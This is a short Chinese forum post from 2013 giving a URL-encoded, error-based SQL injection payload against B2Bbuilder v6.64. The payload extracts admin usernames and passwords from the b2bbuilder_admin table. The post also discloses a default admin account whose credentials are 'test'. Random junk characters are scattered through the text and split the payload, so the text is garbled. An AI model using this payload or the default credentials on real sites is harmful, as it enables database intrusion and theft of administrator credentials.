测试的程序版本为:B2Bbuilder_v6.64 o5 n {4 c3 _1 B d0 [
) _) q! F$ R5 s/ S7 k' Y9 @
. k7 {) d8 {0 q0 _7 m: dhttp://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28) M f4 U/ b- p6 h4 Y% b
select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password- J- {8 ^. N( g. D& i& \( L- }- }
%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1% V) O$ o, c1 v7 h+ j i1 k
%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%293 L/ S ^2 b2 `" o3 \% k- p
*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
1 t1 v: J' r) m" a. S1 @ ; D, u& r* [/ P2 Y5 m
这个B2B程序还有一个默认的管理员帐号,帐号密码都是test& S5 i, S- I- O7 J1 t1 f
v8 D7 J* Z Q" i$ L; v& |7 H
|
发表于 2013-7-26 12:44:48
收藏
支持
反对